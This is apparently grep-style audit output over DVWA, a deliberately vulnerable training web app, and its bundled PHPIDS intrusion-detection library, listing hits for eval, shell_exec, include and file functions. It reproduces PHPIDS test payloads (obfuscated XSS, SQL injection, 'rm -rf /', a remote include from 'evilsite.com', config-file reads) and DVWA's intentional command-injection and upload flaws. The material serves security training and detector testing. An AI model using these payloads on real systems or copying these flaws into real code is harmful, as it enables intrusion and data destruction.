113:        echo '<a href="?test=%22><script>eval(window.name)</script>">No attack detected - click for an example attack</a>';
114-    }
115-} catch (Exception $e) {
116-    /*
./external/phpids/0.6/tests/IDS/MonitorTest.php:409 (3/11) OK | Dubious | Bad | Hide
406-                        default xml namespace=toolbar,y=1&&name
407-                        default xml namespace=toolbar
408-                        default xml namespace=e(y)';
409:        $exploits[] = '-Infinity++in eval(1&&name)';
410-        $exploits[] = 'new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array,
411-                        x=(\'e\')
412-                        x=(\'nam\')+(new Array)+x
./external/phpids/0.6/tests/IDS/MonitorTest.php:475 (4/11) OK | Dubious | Bad | Hide
472-
473-        $exploits = array();
474-        $exploits[] = "/*@cc_on@set@x=88@set@ss=83@set@s=83@*/@cc_on alert(String.fromCharCode(@x,@s,@ss))";
475:        $exploits[] = "@cc_on eval(@cc_on name)";
476-        $exploits[] = "@if(@_mc680x0)@else alert(@_jscript_version)@end";
477-        $exploits[] = "\"\"@cc_on,x=@cc_on'something'@cc_on";
478-
./external/phpids/0.6/tests/IDS/MonitorTest.php:492 (5/11) OK | Dubious | Bad | Hide
489-    public function testXSSList() {
490-
491-        $exploits = array();
492:        $exploits[] = '\'\'"--><script>eval(String.fromCharCode(88,83,83)));%00';
493-        $exploits[] = '"></a style="xss:ex/**/pression(alert(1));"';
494-        $exploits[] = 'top.__proto__._= alert
495-                       _(1)';
./external/phpids/0.6/tests/IDS/MonitorTest.php:519 (6/11) OK | Dubious | Bad | Hide
516-        $exploits[] = "e=1..eval
517-                        e(e(\"\u200fname\"),e)";
518-        $exploits[] = "<x///style=-moz-\&#x362inding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)>";
519:        $exploits[] = "a//a'\u000aeval(name)";
520:        $exploits[] = "a//a';eval(name)";
521-        $exploits[] = "(x) setter=0?0.:alert,x=0";
522-        $exploits[] = "y=('na') + new Array +'me'
523-                        y
./external/phpids/0.6/tests/IDS/MonitorTest.php:580 (7/11) OK | Dubious | Bad | Hide
577-        $exploits[] = 'a=eval,b= [ referrer ] ;a(b)';
578-        $exploits[] = "URL = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ] ]
579-                        (/z/g, [] ) : 0";
580:        $exploits[] = "if(0){} else eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array)
581-                        'foo bar foo bar foo'";
582:        $exploits[] = "switch('foo bar foo bar foo bar') {case eval(new Array + ('eva') + new Array + ('l(n') + new Array + ('ame) + new Array') + new Array):}";
583-        $exploits[] = "xxx='javascr',xxx+=('ipt:eva'),xxx+=('l(n'),xxx+=('ame),y')
584-                        Cen:tri:fug:eBy:pas:sTe:xt:do location=(xxx)
585-                        while(0)
./external/phpids/0.6/tests/IDS/MonitorTest.php:1073 (8/11) OK | Dubious | Bad | Hide
1070-
1071-        $exploits = array();
1072-        $exploits[] = '+alert(1)';
1073:        $exploits[] = 'ACM=1,1+eval(1+name+(+ACM-1),ACM)';
1074:        $exploits[] = '1+eval(1+name+(+1-1),-1)';
1075-        $exploits[] = 'XSS without being noticed<a/href=da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test';
1076-
1077-        $this->_testForPlainEvent($exploits);
./external/phpids/0.6/tests/IDS/MonitorTest.php:1272 (9/11) OK | Dubious | Bad | Hide
1269-    public function testJSONScanning() {
1270-
1271-        $exploits = array();
1272:        $exploits['json_1'] = '{"a":"b","c":["><script>alert(1);</script>", 111, "eval(name)"]}';
1273-        $test = new IDS_Monitor(
1274-            $exploits,
1275-            $this->init
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.php:140 (10/11) OK | Dubious | Bad | Hide
137-     * Evaluates an array PHP code string without array() wrapper
138-     */
139-    protected function evalArray($contents) {
140:        return eval('return array('. $contents .');');
141-    }
142-    
143-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/VarParser/Native.php:17 (11/11) OK | Dubious | Bad | Hide
14-    
15-    protected function evalExpression($expr) {
16-        $var = null;
17:        $result = eval("\$var = $expr;");
18-        if ($result === false) {
19-            throw new HTMLPurifier_VarParserException("Fatal error in evaluated code");
20-        }

exec( (5) Top | Hide

./vulnerabilities/exec/source/low.php:10 (1/5) OK | Dubious | Bad | Hide
8-	if (stristr(php_uname('s'), 'Windows NT')) { 
9-	
10:		$cmd = shell_exec( 'ping  ' . $target );
11-		$html .= '<pre>'.$cmd.'</pre>';
12-		
13-	} else { 
14-	
15:		$cmd = shell_exec( 'ping  -c 3 ' . $target );
16-		$html .= '<pre>'.$cmd.'</pre>';
17-		
18-	}
./vulnerabilities/exec/source/high.php:23 (2/5) OK | Dubious | Bad | Hide
20-		// Determine OS and execute the ping command.
21-		if (stristr(php_uname('s'), 'Windows NT')) { 
22-	
23:			$cmd = shell_exec( 'ping  ' . $target );
24-			$html .= '<pre>'.$cmd.'</pre>';
25-		
26-		} else { 
27-	
28:			$cmd = shell_exec( 'ping  -c 3 ' . $target );
29-			$html .= '<pre>'.$cmd.'</pre>';
30-		
31-		}
./vulnerabilities/exec/source/medium.php:18 (3/5) OK | Dubious | Bad | Hide
15-	// Determine OS and execute the ping command.
16-	if (stristr(php_uname('s'), 'Windows NT')) { 
17-	
18:		$cmd = shell_exec( 'ping  ' . $target );
19-		$html .= '<pre>'.$cmd.'</pre>';
20-		
21-	} else { 
22-	
23:		$cmd = shell_exec( 'ping  -c 3 ' . $target );
24-		$html .= '<pre>'.$cmd.'</pre>';
25-		
26-	}
./external/phpids/0.6/tests/IDS/MonitorTest.php:238 (4/5) OK | Dubious | Bad | Hide
235-        $exploits[] = 'b=(navigator);c=(b.userAgent);d=c[61]+c[49]+c[6]+c[4];e=\'\'+/abcdefghijklmnopqrstuvwxyz.(1)/;f=e[12]+e[15]+e[3]+e[1]+e[20]+e[9]+e[15]+e[14]+e[27]+e[8]+e[1]+e[19]+e[8]+e[27]+e[19]+e[21]+e[2]+e[19]+e[20]+e[18]+e[9]+e[14]+e[7]+e[28]+e[29]+e[30];0[\'\'+[d]](0[\'\'+(d)](f));';
236-        $exploits[] = "c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;(URL=a);";
237-        $exploits[] = "x=''+/abcdefghijklmnopqrstuvwxyz.(1)/;e=x[5];v=x[22];a=x[1];l=x[12];o=x[15];c=x[3];t=x[20];i=x[9];n=x[14];h=x[8];s=x[19];u=x[21];b=x[2];r=x[18];g=x[7];dot=x[27];uno=x[29];op=x[28];cp=x[30];z=e+v+a+l;y=l+o+c+a+t+i+o+n+dot+h+a+s+h+dot+s+u+b+s+t+r+i+n+g+op+uno+cp;0[''+[z]](0[''+(z)](y));";
238:        $exploits[] = "d=''+/eval~locat~ion.h~ash.su~bstring(1)/;e=/.(x?.*)~(x?.*)~(x?.*)~(x?.*)~(x?.*)./;f=e.exec(d);g=f[2];h=f[3];i=f[4];j=f[5];k=g+h+i+j;0[''+(f[1])](0[''+(f[1])](k));";
239-        $exploits[] = "a=1!=1?/x/:'eva';b=1!=1?/x/:'l';a=a+b;e=1!=1?/x/:'h';b=1!=1?/x/:'locatio';c=1!=1?/x/:'n';d=1!=1?/x/:'.has';h=1!=1?/x/:'1)';g=1!=1?/x/:'ring(0';f=1!=1?/x/:'.subst';b=b+c+d+e+f+g+h;B=00[''+[a]](b);00[''+[a]](B);";
240-        $exploits[] = "(z=String)&&(z=z() );{a=(1!=1)?a:'eva'+z}{a+=(1!=1)?a:'l'+z}{b=(1!=1)?b:'locatio'+z}{b+=(1!=1)?b:'n.has'+z}{b+=(1!=1)?b:'h.subst'+z}{b+=(1!=1)?b:'r(1)'+z}{c=(1!=1)?c:(0)[a]}{d=c(b)}{c(d)}";
241-        $exploits[] = "{z=(1==4)?here:{z:(1!=5)?'':be}}{y=(9==2)?dragons:{y:'l'+z.z}}{x=(6==5)?3:{x:'a'+y.y}}{w=(5==8)?9:{w:'ev'+x.x}}{v=(7==9)?3:{v:'tr(2)'+z.z}}{u=(3==8)?4:{u:'sh.subs'+v.v}}{t=(6==2)?6:{t:y.y+'ocation.ha'+u.u}}{s=(4==3)?3:{s:(8!=3)?(2)[w.w]:z}}{r=s.s(t.t)}{s.s(r)+z.z}";
./external/phpids/0.6/tests/IDS/MonitorTest.php:1012 (5/5) OK | Dubious | Bad | Hide
1009-        $exploits = array();
1010-        $exploits[] = ';phpinfo()';
1011-        $exploits[] = '@phpinfo()';
1012:        $exploits[] = '"; <?php exec("rm -rf /"); ?>';
1013-        $exploits[] = '; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');';
1014-        $exploits[] = ';echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))';
1015-        $exploits[] = '; include "http://evilsite.com/evilcode"';

fclose( (7) Top | Hide

./external/phpids/0.6/lib/IDS/Caching/Memcached.php:154 (1/7) OK | Dubious | Bad | Hide
152-        if (!file_exists($this->path)) {
153-            $handle = fopen($this->path, 'w');
154:            fclose($handle);
155-        }
156-
157-        if (!is_writable($this->path)) {
./external/phpids/0.6/lib/IDS/Caching/File.php:149 (2/7) OK | Dubious | Bad | Hide
146-            }
147-            
148-            fwrite($handle, serialize($data));
149:            fclose($handle);
150-        }
151-
152-        return $this;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:41 (3/7) OK | Dubious | Bad | Hide
38-        $fh = fopen($file, 'r');
39-        if (!$fh) return false;
40-        $ret = $this->parseHandle($fh);
41:        fclose($fh);
42-        return $ret;
43-    }
44-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:56 (4/7) OK | Dubious | Bad | Hide
53-        while (!feof($fh)) {
54-            $ret[] = $this->parseHandle($fh);
55-        }
56:        fclose($fh);
57-        return $ret;
58-    }
59-
./external/phpids/0.6/lib/IDS/Log/File.php:197 (5/7) OK | Dubious | Bad | Hide
194-
195-                        $handle = fopen($this->logfile, 'a');
196-                        fwrite($handle, trim($data) . "\n");
197:                        fclose($handle);
198-
199-                    } else {
200-                        throw new Exception(
./external/phpids/0.6/lib/IDS/Log/Email.php:244 (6/7) OK | Dubious | Bad | Hide
241-        if (!file_exists($file)) {
242-            $handle = fopen($file, 'w');
243-            fwrite($handle, time());
244:            fclose($handle);
245-
246-            return false;
247-        }
./dvwa/includes/dvwaPhpIds.inc.php:47 (7/7) OK | Dubious | Bad | Hide
44-function dvwaClearIdsLog()	{
45-	if (isset($_GET['clear_log'])) { 
46-		$fp = fopen(DVWA_WEB_PAGE_TO_PHPIDS_LOG, w);
47:		fclose($fp);
48-		dvwaMessagePush( "PHPIDS log cleared" );
49-		dvwaPageReload();
50-	}

file( (9) Top | Hide

./vulnerabilities/upload/source/low.php:7 (1/9) OK | Dubious | Bad | Hide
5-			$target_path = $target_path . basename( $_FILES['uploaded']['name']);
6-
7:			if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
8-				
9-				$html .= '<pre>';
10-				$html .= 'Your image was not uploaded.';
./vulnerabilities/upload/source/high.php:13 (2/9) OK | Dubious | Bad | Hide
10-			if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
11-
12-
13:				if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
14-					
15-					$html .= '<pre>';
16-					$html .= 'Your image was not uploaded.';
./vulnerabilities/upload/source/medium.php:13 (3/9) OK | Dubious | Bad | Hide
10-			if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
11-
12-
13:				if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
14-				
15-					$html .= '<pre>';
16-					$html .= 'Your image was not uploaded.';
./external/phpids/0.6/lib/IDS/Filter/Storage.php:206 (4/9) OK | Dubious | Bad | Hide
203-            if (!$filters) {
204-                if (file_exists($this->source)) {
205-                    if (LIBXML_VERSION >= 20621) {
206:                        $filters = simplexml_load_file($this->source,
207-                                                       null,
208-                                                       LIBXML_COMPACT);
209-                    } else {
210:                        $filters = simplexml_load_file($this->source);
211-                    }
212-                }
213-            }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.php:21 (5/9) OK | Dubious | Bad | Hide
18-        $interchange = new HTMLPurifier_ConfigSchema_Interchange();
19-        
20-        if (!$dir) $dir = HTMLPURIFIER_PREFIX . '/HTMLPurifier/ConfigSchema/schema/';
21:        $info = parse_ini_file($dir . 'info.ini');
22-        $interchange->name = $info['name'];
23-        
24-        $files = array();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:459 (6/9) OK | Dubious | Bad | Hide
456-     */
457-    public function loadIni($filename) {
458-        if ($this->isFinalized('Cannot load directives after finalization')) return;
459:        $array = parse_ini_file($filename, true);
460-        $this->loadArray($array);
461-    }
462-
./external/phpids/0.6/lib/IDS/Log/Email.php:221 (7/9) OK | Dubious | Bad | Hide
218-        $numPrefixChars = strlen($this->file_prefix);
219-        $files          = scandir($dir);
220-        foreach ($files as $file) {
221:            if (is_file($dir . $file)) {
222-                if (substr($file, 0, $numPrefixChars) == $this->file_prefix) {
223-                    $lastModified = filemtime($dir . $file);
224-
./external/phpids/0.6/lib/IDS/Init.php:92 (8/9) OK | Dubious | Bad | Hide
89-
90-        if ($configPath) {
91-            $this->setConfigPath($configPath);
92:            $this->config = parse_ini_file($this->configPath, true);
93-        }
94-    }
95-
./dvwa/includes/dvwaPhpIds.inc.php:23 (9/9) OK | Dubious | Bad | Hide
20-// PHPIDS Log parsing function 
21-function dvwaReadIdsLog() {
22-
23:	$file_array = file(DVWA_WEB_PAGE_TO_PHPIDS_LOG);
24-	
25-	$data = '';
26-

file_get_contents( (12) Top | Hide

./instructions.php:25 (1/12) OK | Dubious | Bad | Hide
23-$readFile = $docs[ $selectedDocId ][ 'file' ];
24-
25:$instructions = file_get_contents( DVWA_WEB_PAGE_TO_ROOT.$readFile );
26-
27-function urlReplace( $matches ) {
28-	return dvwaExternalLinkUrlGet( $matches[1] );
./vulnerabilities/view_source.php:44 (2/12) OK | Dubious | Bad | Hide
41-}
42-
43-
44:$source = @file_get_contents( DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/{$id}/source/{$security}.php" );
45-$source = str_replace( array( '$html .=' ), array( 'echo' ), $source );
46-
47-$page[ 'body' ] .= "
./vulnerabilities/view_help.php:14 (3/12) OK | Dubious | Bad | Hide
11-$id = $_GET[ 'id' ];
12-$security = $_GET[ 'security' ];
13-
14:$help = file_get_contents( DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/{$id}/help/help.php" );
15-
16-$page[ 'body' ] .= "
17-<div class=\"body_padded\">
./vulnerabilities/view_source_all.php:12 (4/12) OK | Dubious | Bad | Hide
9-
10-$id = $_GET[ 'id' ];
11-
12:$lowsrc = @file_get_contents("./{$id}/source/low.php");
13-$lowsrc = str_replace( array( '$html .=' ), array( 'echo' ), $lowsrc);
14-$lowsrc = highlight_string($lowsrc, true);
15-
16:$medsrc = @file_get_contents("./{$id}/source/medium.php");
17-$medsrc = str_replace( array( '$html .=' ), array( 'echo' ), $medsrc);
18-$medsrc = highlight_string($medsrc, true);
19-
20:$highsrc = @file_get_contents("./{$id}/source/high.php");
21-$highsrc = str_replace( array( '$html .=' ), array( 'echo' ), $highsrc);
22-$highsrc = highlight_string($highsrc, true);
23-
./external/phpids/0.6/tests/IDS/MonitorTest.php:1013 (5/12) OK | Dubious | Bad | Hide
1010-        $exploits[] = ';phpinfo()';
1011-        $exploits[] = '@phpinfo()';
1012-        $exploits[] = '"; <?php exec("rm -rf /"); ?>';
1013:        $exploits[] = '; file_get_contents(\'/usr/local/apache2/conf/httpd.conf\');';
1014:        $exploits[] = ';echo file_get_contents(implode(DIRECTORY_SEPARATOR, array("usr","local","apache2","conf","httpd.conf"))';
1015-        $exploits[] = '; include "http://evilsite.com/evilcode"';
1016-        $exploits[] = '; rm -rf /\0';
1017-        $exploits[] = '"; $_a=(! \'a\') . "php"; $_a.=(! \'a\') . "info"; $_a(1); $b="';
./external/phpids/0.6/lib/IDS/Filter/Storage.php:305 (6/12) OK | Dubious | Bad | Hide
302-             */
303-            if (!$filters) {
304-                if (file_exists($this->source)) {
305:                    $filters = json_decode(file_get_contents($this->source));
306-                } else {
307-                    throw new Exception(
308-                        'JSON data could not be loaded.' .
./external/phpids/0.6/lib/IDS/Caching/File.php:169 (7/12) OK | Dubious | Bad | Hide
166-        // make sure filters are parsed again if cache expired
167-        if (file_exists($this->path) && (time()-filectime($this->path)) < 
168-            $this->config['expiration_time']) {
169:            $data = unserialize(file_get_contents($this->path));
170-              return $data;
171-        }
172-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:33 (8/12) OK | Dubious | Bad | Hide
30-    public function get($config) {
31-        $file = $this->generateFilePath($config);
32-        if (!file_exists($file)) return false;
33:        return unserialize(file_get_contents($file));
34-    }
35-    
36-    public function remove($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema.php:54 (9/12) OK | Dubious | Bad | Hide
51-     * Unserializes the default ConfigSchema.
52-     */
53-    public static function makeFromSerial() {
54:        return unserialize(file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/ConfigSchema/schema.ser'));
55-    }
56-    
57-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/EntityLookup.php:23 (10/12) OK | Dubious | Bad | Hide
20-        if (!$file) {
21-            $file = HTMLPURIFIER_PREFIX . '/HTMLPurifier/EntityLookup/entities.ser';
22-        }
23:        $this->table = unserialize(file_get_contents($file));
24-    }
25-    
26-    /**
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer/ConfigForm.php:62 (11/12) OK | Dubious | Bad | Hide
59-     * Retrieves styling, in case it is not accessible by webserver
60-     */
61-    public static function getCSS() {
62:        return file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/Printer/ConfigForm.css');
63-    }
64-    
65-    /**
66-     * Retrieves JavaScript, in case it is not accessible by webserver
67-     */
68-    public static function getJavaScript() {
69:        return file_get_contents(HTMLPURIFIER_PREFIX . '/HTMLPurifier/Printer/ConfigForm.js');
70-    }
71-    
72-    /**
./external/phpids/0.6/lib/IDS/Log/Email.php:249 (12/12) OK | Dubious | Bad | Hide
246-            return false;
247-        }
248-
249:        $lastAttack = file_get_contents($file);
250-        $difference = time() - $lastAttack;
251-        if ($difference > $this->allowed_rate) {
252-            unlink($file);

fopen( (7) Top | Hide

./external/phpids/0.6/lib/IDS/Caching/Memcached.php:153 (1/7) OK | Dubious | Bad | Hide
151-
152-        if (!file_exists($this->path)) {
153:            $handle = fopen($this->path, 'w');
154-            fclose($handle);
155-        }
156-
./external/phpids/0.6/lib/IDS/Caching/File.php:142 (2/7) OK | Dubious | Bad | Hide
139-        
140-        if ((!file_exists($this->path) || (time()-filectime($this->path)) > 
141-            $this->config['expiration_time'])) {
142:            $handle = @fopen($this->path, 'w+');
143-            
144-            if (!$handle) {
145-                throw new Exception("Cache file couldn't be created");
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:38 (3/7) OK | Dubious | Bad | Hide
35-     */
36-    public function parseFile($file) {
37-        if (!file_exists($file)) return false;
38:        $fh = fopen($file, 'r');
39-        if (!$fh) return false;
40-        $ret = $this->parseHandle($fh);
41-        fclose($fh);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/StringHashParser.php:51 (4/7) OK | Dubious | Bad | Hide
48-    public function parseMultiFile($file) {
49-        if (!file_exists($file)) return false;
50-        $ret = array();
51:        $fh = fopen($file, 'r');
52-        if (!$fh) return false;
53-        while (!feof($fh)) {
54-            $ret[] = $this->parseHandle($fh);
./external/phpids/0.6/lib/IDS/Log/File.php:195 (5/7) OK | Dubious | Bad | Hide
192-                if (!empty($data)) {
193-                    if (is_writable($this->logfile)) {
194-
195:                        $handle = fopen($this->logfile, 'a');
196-                        fwrite($handle, trim($data) . "\n");
197-                        fclose($handle);
198-
./external/phpids/0.6/lib/IDS/Log/Email.php:242 (6/7) OK | Dubious | Bad | Hide
239-        $file       = $dir . DIRECTORY_SEPARATOR . $filename;
240-
241-        if (!file_exists($file)) {
242:            $handle = fopen($file, 'w');
243-            fwrite($handle, time());
244-            fclose($handle);
245-
./dvwa/includes/dvwaPhpIds.inc.php:46 (7/7) OK | Dubious | Bad | Hide
43-// Clear PHPIDS log
44-function dvwaClearIdsLog()	{
45-	if (isset($_GET['clear_log'])) { 
46:		$fp = fopen(DVWA_WEB_PAGE_TO_PHPIDS_LOG, w);
47-		fclose($fp);
48-		dvwaMessagePush( "PHPIDS log cleared" );
49-		dvwaPageReload();

goto (1) Top | Hide

./external/phpids/0.6/tests/IDS/MonitorTest.php:626 (1/1) OK | Dubious | Bad | Hide
624-        $exploits[] = 'asd\' union (select username,password from admins) where id=\'1';
625-        $exploits[] = "1'; WAITFOR TIME '17:48:00 ' shutdown -- -a";
626:        $exploits[] = "1'; anything: goto anything -- -a";
627-        $exploits[] = "' =+ '";
628-        $exploits[] = "asd' =- (-'asd') -- -a";
629-        $exploits[] = 'aa"in+ ("aa") or -1 != "0';

include (70) Top | Hide

./instructions.php:4 (1/70) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./index.php:5 (2/70) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
8-
./login.php:5 (3/70) OK | Dubious | Bad | Hide
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'phpids' ) );
8-
./ids_log.php:4 (4/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-define( 'DVWA_WEB_ROOT_TO_PHPIDS_LOG', 'external/phpids/'.dvwaPhpIdsVersionGet().'/lib/IDS/tmp/phpids_log.txt' );
7-define( 'DVWA_WEB_PAGE_TO_PHPIDS_LOG', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS_LOG );
./about.php:4 (5/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./about.php:54 (6/70) OK | Dubious | Bad | Hide
51-	the Free Software Foundation, either version 3 of the License, or
52-	(at your option) any later version.</p>
53-
54:	<p>The PHPIDS library is included, in good faith, with this DVWA distribution. The operation of PHPIDS is provided without support from the DVWA team. It is licensed under <a href=\"".DVWA_WEB_PAGE_TO_ROOT."instructions.php?doc=PHPIDS-license\">separate terms</a> to the DVWA code.</p>
55-
56-	<h2>Development</h2>
57-
./security.php:4 (7/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:4 (8/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/fi/include.php:9 (9/70) OK | Dubious | Bad | Hide
6-
7-	<div class=\"vulnerable_code_area\">
8-
9:		To include a file edit the ?page=index.php in the URL to determine which file is included.
10-
11-	</div>
12-
./vulnerabilities/fi/index.php:4 (10/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/fi/index.php:35 (11/70) OK | Dubious | Bad | Hide
32-$page[ 'help_button' ] = 'fi';
33-$page[ 'source_button' ] = 'fi';
34-
35:include($file);
36-
37-dvwaHtmlEcho( $page );
38-
./vulnerabilities/fi/source/high.php:5 (12/70) OK | Dubious | Bad | Hide
2-		
3-	$file = $_GET['page']; //The page we wish to display 
4-
5:	// Only allow include.php
6:	if ( $file != "include.php" ) {
7-		echo "ERROR: File not found!";
8-		exit;
9-	}
./vulnerabilities/sqli_blind/index.php:4 (13/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/view_source.php:4 (14/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:4 (15/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/help/help.php:11 (16/70) OK | Dubious | Bad | Hide
8-	
9-	<p>Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.</p>
10-
11:	<p>Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, given and family names, any too short password 
12-	(usually thought to be 6 or 7 characters or less), or any password meeting a too restrictive and so predictable, pattern (eg, alternating vowels and consonants).</p>
13-
14-	<p>A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always
./vulnerabilities/exec/index.php:4 (17/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/upload/index.php:4 (18/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/view_help.php:4 (19/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:4 (20/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/view_source_all.php:3 (21/70) OK | Dubious | Bad | Hide
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./vulnerabilities/xss_s/index.php:4 (22/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_r/index.php:4 (23/70) OK | Dubious | Bad | Hide
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./external/phpids/0.6/docs/examples/example.php:19 (24/70) OK | Dubious | Bad | Hide
16- * GNU General Public License for more details.
17- */
18-
19:// set the include path properly for PHPIDS
20:set_include_path(
21:    get_include_path()
22-    . PATH_SEPARATOR
